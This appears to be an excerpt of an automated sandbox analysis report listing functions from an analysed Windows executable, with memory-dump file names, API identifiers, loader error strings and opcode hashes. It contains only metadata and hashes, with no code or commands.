                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                      • Instruction ID: c84895071e1fd03f6f34acca5ed52635089021da43f7f406afedd8c0effdd7f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5441C86380964A44FA6599388E04EB8D6809F22BA1DD8D2F0DCD9D73C2DF8CF947C521
                                                                                                                                                                                                                                      Function 00007FF70AF09F10 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                      • Instruction ID: 11c6d693fc5fde7047bdd0adae7ca9849274188e941a2970959f3aadc1479cd4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9841BF23714A5982FF04EF2ADE145A9A3A1BB48FD0F999436DE0D97B58DF3DE4428300
                                                                                                                                                                                                                                      Function 00007FF70AF08154 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                      • Instruction ID: ec40078d3bb4989388ccb1dcb2840be1f4dab694b2f5f862c1797205d3c6e77f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C331D433B18B4281F764AB21EC4053EB695AF85BE0F944279EA8D93BD5DF3CE0018754
                                                                                                                                                                                                                                      Function 00007FF70AF195E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                      • Instruction ID: 80c410392532eb5db70354b7a0be8b1cb9e231b3e9c2b12afa15a58aa920ab7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F04473B182558AEB98DF69E84262977D0FB18380F80D1B9D58987B04DB3CD0618F14
                                                                                                                                                                                                                                      Function 00007FF70AEFD37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                      • Instruction ID: 28a896077cfdc752ea4c0f13e3781f4ee8604ed7b13c6d12ab7af7c238fa4f71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3A0012290D84AD0F645AB00EC91025A731FF54304FC000B1E90D411A0AF2CE404A221
                                                                                                                                                                                                                                      Function 00007FF70AEF76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                      • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                      • Instruction ID: 35ea1e739dc285f9a32730c3726a9fe829d3dff3ac73b6bb8e06251184b4cf32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4029A26E0DB17D2FA59BB65EC115B8A3B1AF08795FC551B5D82E023A4EF3CF5488230
                                                                                                                                                                                                                                      Function 00007FF70AEF81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF70AEF45E4,00000000,00007FF70AEF1985), ref: 00007FF70AEF9439
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF70AEF88A7,?,?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF821C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF2810: MessageBoxW.USER32 ref: 00007FF70AEF28EA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                      • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                      • Instruction ID: 51db663578e29596923a6cfb9b8df267e2f065df50904b3a3bfff3cdba169b8b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B517513A1DA8381FB50FB25EC526BAE2A1EF94784FC444B1DA0E836D5EF2CF5058760
                                                                                                                                                                                                                                      Function 00007FF70AEF2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                      • Instruction ID: f742f678daa0bdd39b71f32d08744b57abd62ec7a381a5bf34a601c0fde3de0a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4951C7266147A186E634AF26F8181BAF7A1FB98B61F404125EBDE43794DF3CD045DB20
                                                                                                                                                                                                                                      Function 00007FF70AEF80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                      • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                      • Instruction ID: de84b2028bb02f28c0566a1b4292edd95e41cc1ead2eeb60be7d88fe200f9ed9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3216227B08A43C1FB55AB7AEC55169A350EF88B90FC842B1DA2D43395DF2CE5908221
                                                                                                                                                                                                                                      Function 00007FF70AF06300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                      • Instruction ID: ea1f3d39af846da2f22d00ebd0f2e934ab61921b1e8ea1c7ffc5d2c0794b4907
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D127F63E0C15386FBA07A14D954A79B6A2FF40754FC44175E68ACBAC4DFBCF5A08B20
                                                                                                                                                                                                                                      Function 00007FF70AF01038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                      • Instruction ID: f7ae7d69a8883e34aa2252b19a740cfb38b11d8db6866dce89720b897bd2d6bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0126F27E0C14386FB20BB55E854A7AB6A1FF41754FC84275E699C7AC4DB7CF4808B28
                                                                                                                                                                                                                                      Function 00007FF70AEF1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                      • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                      • Instruction ID: a248880fead195cb1ab725df0f711a1e996be168116a9ace3cb82bac07519c0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B413862A0865782FA10FB12EC05ABAE294EF44BD4FC445B2EE0D47796DF3CE5068760
                                                                                                                                                                                                                                      Function 00007FF70AEF1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                      • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                      • Instruction ID: e45dbdb3be9714d06b22e304a62f245d1d097fe5803ca5abcee55ad778157d8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D413723A0864786FA10FB21D8426B9E390EF44B94FC446B2EE4D47B95EF3CF5068764
                                                                                                                                                                                                                                      Function 00007FF70AEFEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                      • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                      • Instruction ID: bfec44de1876ea28f3624deee92e70e8bc37a694104285b7e9ee505838002286
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AD16D63A0874286FB20BB25D8423ADA7A0FF45798FD00176EA8D57BA9DF38F441C711
